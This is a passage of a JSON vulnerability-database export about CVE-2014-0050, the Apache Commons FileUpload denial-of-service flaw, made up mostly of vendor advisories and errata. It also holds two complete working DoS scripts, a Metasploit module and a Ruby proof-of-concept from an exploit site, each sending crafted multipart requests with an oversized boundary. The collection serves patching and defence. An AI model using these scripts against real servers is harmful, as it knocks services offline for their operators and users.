Content-Type header for a multipart request, causing Tomcat to\nenter an infinite loop when processing such an incoming request.\n(CVE-2014-0050)\n\nAll users of Red Hat JBoss Web Server 2.0.1 as provided from the Red Hat\nCustomer Portal are advised to apply this update. 
The Red Hat JBoss Web\nServer process must be restarted for the update to take effect.", "modified": "2019-02-20T17:15:04", "published": "2014-05-21T19:32:03", "id": "RHSA-2014:0528", "href": "https://access.redhat.com/errata/RHSA-2014:0528", "type": "redhat", "title": "(RHSA-2014:0528) Moderate: Red Hat JBoss Web Server 2.0.1 tomcat6 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:49", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4322", "CVE-2014-0050", "CVE-2014-0075", "CVE-2014-0096", "CVE-2014-0099"], "description": "Apache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies.\n\nIt was discovered that Apache Tomcat did not limit the length of chunk\nsizes when using chunked transfer encoding. A remote attacker could use\nthis flaw to perform a denial of service attack against Tomcat by streaming\nan unlimited quantity of data, leading to excessive consumption of server\nresources. (CVE-2014-0075)\n\nIt was found that Apache Tomcat did not check for overflowing values when\nparsing request content length headers. A remote attacker could use this\nflaw to perform an HTTP request smuggling attack on a Tomcat server located\nbehind a reverse proxy that processed the content length header correctly.\n(CVE-2014-0099)\n\nIt was found that the org.apache.catalina.servlets.DefaultServlet\nimplementation in Apache Tomcat allowed the definition of XML External\nEntities (XXEs) in provided XSLTs. A malicious application could use this\nto circumvent intended security restrictions to disclose sensitive\ninformation. (CVE-2014-0096)\n\nThe CVE-2014-0075 issue was discovered by David Jorm of Red Hat Product\nSecurity.\n\nThis update also fixes the following bugs:\n\n* The patch that resolved the CVE-2014-0050 issue contained redundant code.\nThis update removes the redundant code. 
(BZ#1094528)\n\n* The patch that resolved the CVE-2013-4322 issue contained an invalid\ncheck that triggered a java.io.EOFException while reading trailer headers\nfor chunked requests. This update fixes the check and the aforementioned\nexception is no longer triggered in the described scenario. (BZ#1095602)\n\nAll Tomcat 6 users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. Tomcat must be\nrestarted for this update to take effect.\n", "modified": "2018-06-06T20:24:29", "published": "2014-07-09T04:00:00", "id": "RHSA-2014:0865", "href": "https://access.redhat.com/errata/RHSA-2014:0865", "type": "redhat", "title": "(RHSA-2014:0865) Moderate: tomcat6 security and bug fix update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:39", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4286", "CVE-2013-4322", "CVE-2014-0033", "CVE-2014-0050"], "description": "Red Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nHTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector\n(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat\nNative library.\n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. A remote attacker could use this flaw\nto poison a web cache, perform cross-site scripting (XSS) attacks, or\nobtain sensitive information from other requests. (CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. 
A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. (CVE-2013-4322)\n\nIt was found that previous fixes in Tomcat 6 to path parameter handling\nintroduced a regression that caused Tomcat to not properly disable URL\nrewriting to track session IDs when the disableURLRewriting option was\nenabled. A man-in-the-middle attacker could potentially use this flaw to\nhijack a user's session. (CVE-2014-0033)\n\nA denial of service flaw was found in the way Apache Commons FileUpload,\nwhich is embedded in Tomcat, handled small-sized buffers used by\nMultipartStream. A remote attacker could use this flaw to create a\nmalformed Content-Type header for a multipart request, causing Tomcat to\nenter an infinite loop when processing such an incoming request.\n(CVE-2014-0050)\n\nAll users of Red Hat JBoss Web Server 2.0.1 are advised to upgrade to these\nupdated tomcat6 packages, which contain backported patches to correct these\nissues. 
The Red Hat JBoss Web Server process must be restarted for the\nupdate to take effect.", "modified": "2018-08-09T19:46:59", "published": "2014-05-21T19:09:00", "id": "RHSA-2014:0525", "href": "https://access.redhat.com/errata/RHSA-2014:0525", "type": "redhat", "title": "(RHSA-2014:0525) Moderate: Red Hat JBoss Web Server 2.0.1 tomcat6 security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T14:35:34", "bulletinFamily": "unix", "cvelist": ["CVE-2013-6440", "CVE-2013-7285", "CVE-2014-0002", "CVE-2014-0003", "CVE-2014-0050"], "description": "Fuse ESB Enterprise is an integration platform based on Apache ServiceMix.\nFuse MQ Enterprise, based on Apache ActiveMQ, is a standards-compliant\nmessaging system that is tailored for use in mission critical applications.\n\nThis release of Fuse ESB Enterprise/MQ Enterprise 7.1.0 R1 P3 is an update\nto Fuse ESB Enterprise 7.1.0 and Fuse MQ Enterprise 7.1.0. It includes\nvarious bug fixes, which are listed in the README file included with the\npatch files.\n\nThe following security issues are also addressed with this release:\n\nIt was found that XStream could deserialize arbitrary user-supplied XML\ncontent, representing objects of any type. A remote attacker able to pass\nXML to XStream could use this flaw to perform a variety of attacks,\nincluding remote code execution in the context of the server running the\nXStream application. (CVE-2013-7285)\n\nIt was found that the Apache Camel XSLT component allowed XSL stylesheets\nto call external Java methods. A remote attacker able to submit messages to\na Camel route could use this flaw to perform arbitrary remote code\nexecution in the context of the Camel server process. (CVE-2014-0003)\n\nIt was found that the ParserPool and Decrypter classes in the OpenSAML Java\nimplementation resolved external entities, permitting XML External Entity\n(XXE) attacks. 
A remote attacker could use this flaw to read files\naccessible to the user running the application server and, potentially,\nperform other more advanced XXE attacks. (CVE-2013-6440)\n\nIt was found that the Apache Camel XSLT component would resolve entities in\nXML messages when transforming them using an XSLT route. A remote attacker\nable to submit messages to an XSLT Camel route could use this flaw to read\nfiles accessible to the user running the application server and,\npotentially, perform other more advanced XXE attacks. (CVE-2014-0002)\n\nA denial of service flaw was found in the way Apache Commons FileUpload\nhandled small-sized buffers used by MultipartStream. A remote attacker\ncould use this flaw to create a malformed Content-Type header for a\nmultipart request, causing Apache Commons FileUpload to enter an infinite\nloop when processing such an incoming request. (CVE-2014-0050)\n\nThe CVE-2014-0002 and CVE-2014-0003 issues were discovered by David Jorm of\nthe Red Hat Security Response Team, and the CVE-2013-6440 issue was\ndiscovered by David Illsley, Ron Gutierrez of Gotham Digital Science, and\nDavid Jorm of the Red Hat Security Response Team.\n\nAll users of Fuse ESB Enterprise/MQ Enterprise 7.1.0 as provided from the\nRed Hat Customer Portal are advised to upgrade to Fuse ESB Enterprise/MQ\nEnterprise 7.1.0 R1 P3.\n", "modified": "2019-03-22T23:43:52", "published": "2014-04-30T04:00:00", "id": "RHSA-2014:0452", "href": "https://access.redhat.com/errata/RHSA-2014:0452", "type": "redhat", "title": "(RHSA-2014:0452) Important: Fuse ESB Enterprise/Fuse MQ Enterprise 7.1.0 update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "atlassian": [{"lastseen": "2020-12-24T14:35:32", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "description": "Apache commons-fileupload 1.3.1 was released this weekend with a fix for CVE-2014-0050, involving a DoS attack when using specially crafted multipart requests. 
We need to determine if Confluence is vulnerable, and if so, upgrade to this version of the library.", "edition": 9, "modified": "2018-10-11T08:42:37", "published": "2014-02-10T05:56:15", "id": "ATLASSIAN:CONFSERVER-32557", "href": "https://jira.atlassian.com/browse/CONFSERVER-32557", "title": "Security vulnerability in apache commons fileupload", "type": "atlassian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-03-22T18:16:53", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "edition": 1, "description": "Apache commons-fileupload 1.3.1 was released this weekend with a fix for CVE-2014-0050, involving a DoS attack when using specially crafted multipart requests. We need to determine if Confluence is vulnerable, and if so, upgrade to this version of the library.", "modified": "2017-02-17T04:33:34", "published": "2014-02-10T05:56:15", "href": "https://jira.atlassian.com/browse/CONF-32557", "id": "ATLASSIAN:CONF-32557", "title": "Security vulnerability in apache commons fileupload", "type": "atlassian", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "metasploit": [{"lastseen": "2020-10-08T00:36:32", "description": "This module triggers an infinite loop in Apache Commons FileUpload 1.0 through 1.3 via a specially crafted Content-Type header. Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50 and 8.0.0-RC1 through 8.0.1 are affected by this issue. 
Tomcat 6 also uses Commons FileUpload as part of the Manager application.\n", "published": "2014-02-22T13:56:59", "type": "metasploit", "title": "Apache Commons FileUpload and Apache Tomcat DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2020-10-02T20:00:37", "id": "MSF:AUXILIARY/DOS/HTTP/APACHE_COMMONS_FILEUPLOAD_DOS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Apache Commons FileUpload and Apache Tomcat DoS',\n 'Description' => %q{\n This module triggers an infinite loop in Apache Commons FileUpload 1.0\n through 1.3 via a specially crafted Content-Type header.\n Apache Tomcat 7 and Apache Tomcat 8 use a copy of FileUpload to handle\n mime-multipart requests, therefore, Apache Tomcat 7.0.0 through 7.0.50\n and 8.0.0-RC1 through 8.0.1 are affected by this issue. 
Tomcat 6 also\n uses Commons FileUpload as part of the Manager application.\n },\n 'Author' =>\n [\n 'Unknown', # This issue was reported to the Apache Software Foundation and accidentally made public.\n 'ribeirux' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2014-0050'],\n ['URL', 'http://tomcat.apache.org/security-8.html'],\n ['URL', 'http://tomcat.apache.org/security-7.html']\n ],\n 'DisclosureDate' => '2014-02-06'\n ))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, \"The request URI\", '/']),\n OptInt.new('RLIMIT', [ true, \"Number of requests to send\",50])\n ])\n end\n\n def run\n boundary = \"0\"*4092\n opts = {\n 'method' => \"POST\",\n 'uri' => normalize_uri(target_uri.to_s),\n 'ctype' => \"multipart/form-data; boundary=#{boundary}\",\n 'data' => \"#{boundary}00000\",\n 'headers' => {\n 'Accept' => '*/*'\n }\n }\n\n # XXX: There is rarely, if ever, a need for a 'for' loop in Ruby\n # This should be rewritten with 1.upto() or Enumerable#each or\n # something\n for x in 1..datastore['RLIMIT']\n print_status(\"Sending request #{x} to #{peer}\")\n begin\n c = connect\n r = c.request_cgi(opts)\n c.send_request(r)\n # Don't wait for a response\n rescue ::Rex::ConnectionError => exception\n print_error(\"Unable to connect: '#{exception.message}'\")\n return\n ensure\n disconnect(c) if c\n end\n end\n end\nend\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/http/apache_commons_fileupload_dos.rb"}], "github": [{"lastseen": "2020-03-10T23:26:06", "bulletinFamily": "software", "cvelist": ["CVE-2014-0050"], "description": "MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses 
a loop's intended exit conditions.", "edition": 2, "modified": "2019-07-03T21:02:05", "published": "2018-12-21T17:51:42", "id": "GHSA-XX68-JFCG-XMMF", "href": "https://github.com/advisories/GHSA-xx68-jfcg-xmmf", "title": "High severity vulnerability that affects commons-fileupload:commons-fileupload", "type": "github", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "jvn": [{"lastseen": "2019-05-29T19:49:22", "bulletinFamily": "info", "cvelist": ["CVE-2014-0050"], "description": "\n ## Description\n\nApache Commons FileUpload provided by Apache Software Foundation contains an issue in processing a multi-part request, which may cause the process to be in an infinite loop. \n \nAs of 2014 February 12, an exploit tool to attack against this vulnerability has been confirmed.\n\n ## Impact\n\nProcessing a malformed request may cause the condition that the target system does not respond.\n\n ## Solution\n\n**Update the Software** \nUpdate to the latest version that contains a fix for this vulnerability: \n\n * [Apache Commons FileUpload 1.3.1](<http://commons.apache.org/proper/commons-fileupload/download_fileupload.cgi>)\n * [Apache Tomcat 8.0.3](<http://www.apache.org/dist/tomcat/tomcat-8/v8.0.3/>)\n * [Apache Tomcat 7.0.52](<http://www.apache.org/dist/tomcat/tomcat-7/v7.0.52/>)\n * [Apache Struts 2.3.16.1](<http://struts.apache.org/download.cgi#struts23161>)\n**Apply the Patch** \nIn the developer's repository, the respective source code that contains a fix for this vulnerability has been released. \n\n * Apache Commons FileUpload: <http://svn.apache.org/r1565143>\n * Apache Tomcat 8: <http://svn.apache.org/r1565163>\n * Apache Tomcat 7: <http://svn.apache.org/r1565169>\n**Workaround** \nApplying the following workaround may mitigate the effect of this vulnerability. \n\n * Limit the Content-Type header size to less than 4091 bytes\nFor more information, please refer to the developer's site. 
\n\n ## Products Affected\n\n * Commons FileUpload 1.0 to 1.3\n * Apache Tomcat 8.0.0-RC1 to 8.0.1\n * Apache Tomcat 7.0.0 to 7.0.50\n * Products that use Apache Commons FileUpload\nAccording to the developer, Apache Tomcat 6 and earlier are not affected. \n \nThe developer also states that Apache Commons FileUpload is widely used for multiple Apache products, therefore, multiple Apache products other than Apache Tomcat may be affected by this vulnerability. \nAccording to the developer, the following products may be affected. \n\n * Jenkins\n * JSPWiki\n * JXP\n * Lucene-Solr\n * onemind-commons\n * Spring\n * Stapler\n * Struts 1, 2\n * WSDL2c\n", "edition": 4, "modified": "2016-07-12T00:00:00", "published": "2014-02-10T00:00:00", "id": "JVN:14876762", "href": "http://jvn.jp/en/jp/JVN14876762/index.html", "title": "JVN#14876762: Apache Commons FileUpload vulnerable to denial-of-service (DoS)", "type": "jvn", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-01-04T07:03:17", "description": "Exploit for multiple platform in category dos / poc", "edition": 2, "published": "2014-02-12T00:00:00", "type": "zdt", "title": "Apache Commons FileUpload and Apache Tomcat Denial of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0050"], "modified": "2014-02-12T00:00:00", "id": "1337DAY-ID-21887", "href": "https://0day.today/exploit/description/21887", "sourceData": "#################################################################################\r\n# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\r\n# #\r\n# Author: Oren Hafif, Trustwave SpiderLabs Research #\r\n# This is a Proof of Concept code that was created for the sole purpose #\r\n# of assisting system administrators in evaluating whether their applications #\r\n# are vulnerable to this issue or not #\r\n# #\r\n# Please use responsibly. 
#\r\n#################################################################################\r\n \r\n \r\nrequire 'net/http'\r\nrequire 'net/https'\r\nrequire 'optparse'\r\nrequire 'openssl'\r\n \r\n \r\noptions = {}\r\n \r\nopt_parser = OptionParser.new do |opt|\r\n opt.banner = \"Usage: ./CVE-2014-0050.rb [OPTIONS]\"\r\n opt.separator \"\"\r\n opt.separator \"Options\"\r\n opt.on(\"-u\",\"--url URL\",\"The url of the Servlet/JSP to test for Denial of Service\") do |url|\r\n options[:url] = url\r\n end\r\n \r\n opt.on(\"-n\",\"--number_of_requests NUMBER_OF_REQUSETS\",\"The number of requests to send to the server. The default value is 10\") do |number_of_requests|\r\n options[:number_of_requests] = number_of_requests\r\n end\r\n \r\n opt.on(\"-h\",\"--help\",\"help\") do\r\n puts \"\"\r\n puts \"#################################################################################\"\r\n puts \"# CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat Denial-of-Service #\"\r\n puts \"# #\"\r\n puts \"# Author: Oren Hafif, Trustwave SpiderLabs Research #\"\r\n puts \"# This is a Proof of Concept code that was created for the sole purpose #\"\r\n puts \"# of assisting system administrators in evaluating whether or not #\"\r\n puts \"# their applications are vulnerable to this issue. #\"\r\n puts \"# #\"\r\n puts \"# Please use responsibly. 
#\"\r\n puts \"#################################################################################\"\r\n puts \"\"\r\n puts opt_parser\r\n puts \"\"\r\n \r\n exit\r\n end\r\nend\r\n \r\nopt_parser.parse!\r\n \r\n \r\nuri = \"\"\r\nbegin\r\n uri = URI.parse(options[:url])\r\nrescue Exception => e\r\n puts \"\"\r\n puts \"ERROR: Invalid URL was entered #{options[:url]}\"\r\n puts \"\"\r\n puts opt_parser\r\n exit\r\nend\r\n \r\nnumber_of_requests = 10;\r\nif(options[:number_of_requests] != nil)\r\n begin\r\n number_of_requests = Integer( options[:number_of_requests] )\r\n throw Exception.new if number_of_requests <= 0\r\n rescue Exception => e\r\n puts e\r\n puts \"\"\r\n puts \"ERROR: Invalid NUMBER_OF_REQUSETS was entered #{options[:number_of_requests]}\"\r\n puts \"\"\r\n puts opt_parser\r\n exit\r\n end\r\nend\r\n \r\n#uri = URI.parse(uri)\r\n \r\n \r\nputs \"\"\r\nputs \"WARNING: Usage of this tool for attack purposes is forbidden - press Ctrl-C now to abort...\"\r\ni=10\r\ni.times { print \"#{i.to_s}...\";sleep 1; i-=1;}\r\nputs \"\"\r\n \r\n \r\nnumber_of_requests.times do\r\n begin\r\n puts \"Request Launched\"\r\n https = Net::HTTP.new(uri.host,uri.port)\r\n https.use_ssl = uri.scheme==\"https\"\r\n https.verify_mode = OpenSSL::SSL::VERIFY_NONE\r\n req = Net::HTTP::Post.new(uri.path)\r\n req.add_field(\"Content-Type\",\"multipart/form-data; boundary=#{\"a\"*4092}\")\r\n req.add_field(\"lf-None-Match\",\"59e532f501ac13174dd9c488f897ee75\")\r\n req.body = \"b\"*4097\r\n https.read_timeout = 1\r\n res = https.request(req)\r\n rescue Timeout::Error=>e\r\n puts \"Timeout - continuing DoS...\"\r\n rescue Exception=>e\r\n puts e.inspect\r\n end\r\nend\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/21887"}], "huawei": [{"lastseen": "2019-02-01T18:02:28", "bulletinFamily": "software", "cvelist": ["CVE-2014-0116", "CVE-2014-0050", "CVE-2014-0094"], 
"description": "Products\n\nSwitches\nRouters\nWLAN\nServers\nSee All\n\n\n\nSolutions\n\nCloud Data Center\nEnterprise Networking\nWireless Private Network\nSolutions by Industry\nSee All\n\n\n\nServices\n\nTraining and Certification\nICT Lifecycle Services\nTechnology Services\nIndustry Solution Services\nSee All\n\n\n\nSee all offerings at e.huawei.com\n\n\n\nNeed Support ?\n\nProduct Support\nSoftware Download\nCommunity\nTools\n\nGo to Full Support", "edition": 1, "modified": "2014-07-08T00:00:00", "published": "2014-07-07T00:00:00", "id": "HUAWEI-SA-20140707-01-STRUTS2", "href": "https://www.huawei.com/en/psirt/security-advisories/2014/hw-350733", "title": "Security Advisory-Apache Struts2 vulnerability on Huawei multiple products", "type": "huawei", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:39", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4322", "CVE-2014-0050", "CVE-2013-4286"], "description": "[0:6.0.24-64]\n- Resolves: CVE-2014-0050\n[0:6.0.24-63]\n- Resolves: CVE-2013-4322 CVE-2013-4286", "edition": 4, "modified": "2014-04-23T00:00:00", "published": "2014-04-23T00:00:00", "id": "ELSA-2014-0429", "href": "http://linux.oracle.com/errata/ELSA-2014-0429.html", "title": "tomcat6 security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:44", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0186", "CVE-2013-4322", "CVE-2014-0050", "CVE-2013-4286"], "description": "[0:7.0.42-5]\n- Related: CVE-2013-4286\n- Related: CVE-2013-4322\n- Related: CVE-2014-0050\n- revisit patches for above.", "edition": 4, "modified": "2014-07-20T00:00:00", "published": "2014-07-20T00:00:00", "id": "ELSA-2014-0686", "href": "http://linux.oracle.com/errata/ELSA-2014-0686.html", "title": "tomcat security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2019-05-29T18:38:36", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0099", "CVE-2013-4322", "CVE-2014-0050", "CVE-2014-0096", "CVE-2014-0075"], "description": "[0:6.0.24-72]\n- Related: CVE-2014-0075 - rebuild to generate javadoc\n- correctly. previous build generated 0-length javadoc\n[0:6.0.24-69]\n- Related: CVE-2014-0075 incomplete\n[0:6.0.24-68]\n- Related: CVE-2013-4322. arches needs to be specified\n- as in arches noarch, so docs/webapps will produce\n- full files. building for ppc will generate empty\n- javadoc.\n[0:6.0.24-67]\n- Related: CVE-2014-0050\n- Related: CVE-2013-4322\n[0:6.0.24-66]\n- Resolves: CVE-2014-0099\n- Resolves: CVE-2014-0096\n- Resolves: CVE-2014-0075\n[0:6.0.24-65]\n- Related: CVE-2014-0050 copy paste error", "edition": 4, "modified": "2014-07-09T00:00:00", "published": "2014-07-09T00:00:00", "id": "ELSA-2014-0865", "href": "http://linux.oracle.com/errata/ELSA-2014-0865.html", "title": "tomcat6 security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:58:37", "bulletinFamily": "info", "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112"], "description": "VMware has patched several serious security vulnerabilities in its vCenter Operations Center Management suite, one of which could lead to remote code execution on vulnerable machines.\n\nAll of the vulnerabilities that the company [patched](<http://www.vmware.com/security/advisories/VMSA-2014-0007.html>) lie in the Apache Struts Java application framework, and the most serious of them is CVE-2014-0112, which allows an attacker to run arbitrary code.\n\n\u201cParametersInterceptor in Apache Struts before 2.3.16.2 does not properly restrict access to the getClass method, which allows remote attackers to \u201cmanipulate\u201d the ClassLoader and execute arbitrary code via a crafted request,\u201d the vulnerability 
[description](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0112>) says.\n\nApache [fixed](<https://struts.apache.org/announce.html>) the vulnerability in a new release of Struts back in April. The issue was created because of an incomplete patch for a previous vulnerability in Struts. The three Struts vulnerabilities all are addressed in the release of version 5.8.2 of VMware vCOPS, the company said.\n\nThe other two, less serious vulnerabilities fixed in the new version of vCOPS are CVE-2014-0050 and CVE-2014-0094. The first flaw is a problem that could lead to a denial-of-service condition if exploited by a remote attacker.\n\n\u201cMultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop\u2019s intended exit conditions,\u201d the [advisory](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0050>) says.\n\nCVE-2014-0094 is also remotely exploitable by an unauthenticated attacker, who could manipulate a component of Struts.\n\n\u201cThe ParametersInterceptor in Apache Struts before 2.3.16.1 allows remote attackers to \u201cmanipulate\u201d the ClassLoader via the class parameter, which is passed to the getClass method,\u201d the [advisory](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0094>) says.\n", "modified": "2014-06-25T19:22:45", "published": "2014-06-25T13:59:49", "id": "THREATPOST:40B4CEF304ADBCA0734F292661E7810B", "href": "https://threatpost.com/vmware-patches-apache-struts-flaws-in-vcops/106858/", "type": "threatpost", "title": "VMware Patches Apache Struts Flaws in vCOPS", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "vmware": [{"lastseen": "2019-11-06T16:05:33", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0050", "CVE-2014-0094", "CVE-2014-0112"], "description": 
"The Apache Struts library is updated to version 2.3.16.2 to address multiple security issues. \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2014-0050, CVE-2014-0094, and CVE-2014-0112 to these issues. \n \nCVE-2014-0112 may lead to remote code execution. This issue was found to be only partially addressed in CVE-2014-0094. \n \nCVE-2014-0050 may lead to a denial of service condition. \n \nvCenter Operations Management Suite (vCOps) is affected by both CVE-2014-0112 and CVE-2014-0050. Exploitation of CVE-2014-0112 may lead to remote code execution without authentication. \n \nvCenter Orchestrator (vCO) is affected by CVE-2014-0050 and not by CVE-2014-0112. \n \nWorkaround \n \nA workaround for CVE-2014-0112 is documented in VMware Knowledge Base article 2081470. \n \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available.\n", "edition": 4, "modified": "2014-09-09T00:00:00", "published": "2014-06-24T00:00:00", "id": "VMSA-2014-0007", "href": "https://www.vmware.com/security/advisories/VMSA-2014-0007.html", "title": "VMware product updates address security vulnerabilities in Apache Struts library", "type": "vmware", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntu": [{"lastseen": "2020-07-02T11:37:13", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4322", "CVE-2014-0050", "CVE-2013-4286", "CVE-2014-0033"], "description": "It was discovered that Tomcat incorrectly handled certain inconsistent \nHTTP headers. A remote attacker could possibly use this flaw to conduct \nrequest smuggling attacks. (CVE-2013-4286)\n\nIt was discovered that Tomcat incorrectly handled certain requests \nsubmitted using chunked transfer encoding. A remote attacker could use this \nflaw to cause the Tomcat server to stop responding, resulting in a denial \nof service. 
(CVE-2013-4322)\n\nIt was discovered that Tomcat incorrectly applied the disableURLRewriting \nsetting when handling a session id in a URL. A remote attacker could \npossibly use this flaw to conduct session fixation attacks. This issue \nonly applied to Ubuntu 12.04 LTS. (CVE-2014-0033)\n\nIt was discovered that Tomcat incorrectly handled malformed Content-Type \nheaders and multipart requests. A remote attacker could use this flaw to \ncause the Tomcat server to stop responding, resulting in a denial of \nservice. This issue only applied to Ubuntu 12.10 and Ubuntu 13.10. \n(CVE-2014-0050)", "edition": 5, "modified": "2014-03-06T00:00:00", "published": "2014-03-06T00:00:00", "id": "USN-2130-1", "href": "https://ubuntu.com/security/notices/USN-2130-1", "title": "Tomcat vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:28:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-3544", "CVE-2013-4322", "CVE-2014-0050", "CVE-2013-4286"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0429\n\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) technologies.\n\nIt was found that when Tomcat processed a series of HTTP requests in which\nat least one request contained either multiple content-length headers, or\none content-length header with a chunked transfer-encoding header, Tomcat\nwould incorrectly handle the request. A remote attacker could use this flaw\nto poison a web cache, perform cross-site scripting (XSS) attacks, or\nobtain sensitive information from other requests. (CVE-2013-4286)\n\nIt was discovered that the fix for CVE-2012-3544 did not properly resolve a\ndenial of service flaw in the way Tomcat processed chunk extensions and\ntrailing headers in chunked requests. 
A remote attacker could use this flaw\nto send an excessively long request that, when processed by Tomcat, could\nconsume network bandwidth, CPU, and memory on the Tomcat server. Note that\nchunked transfer encoding is enabled by default. (CVE-2013-4322)\n\nA denial of service flaw was found in the way Apache Commons FileUpload\nhandled small-sized buffers used by MultipartStream. A remote attacker\ncould use this flaw to create a malformed Content-Type header for a\nmultipart request, causing JBoss Web to enter an infinite loop when\nprocessing such an incoming request. (CVE-2014-0050)\n\nAll Tomcat users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. Tomcat must be\nrestarted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2014-April/032303.html\n\n**Affected packages:**\ntomcat6\ntomcat6-admin-webapps\ntomcat6-docs-webapp\ntomcat6-el-2.1-api\ntomcat6-javadoc\ntomcat6-jsp-2.1-api\ntomcat6-lib\ntomcat6-servlet-2.5-api\ntomcat6-webapps\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2014-0429.html", "edition": 3, "modified": "2014-04-23T19:07:14", "published": "2014-04-23T19:07:14", "href": "http://lists.centos.org/pipermail/centos-announce/2014-April/032303.html", "id": "CESA-2014:0429", "title": "tomcat6 security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:24:11", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0099", "CVE-2013-4322", "CVE-2014-0050", "CVE-2014-0096", "CVE-2014-0075"], "description": "**CentOS Errata and Security Advisory** CESA-2014:0865\n\n\nApache Tomcat is a servlet container for the Java Servlet and JavaServer\nPages (JSP) 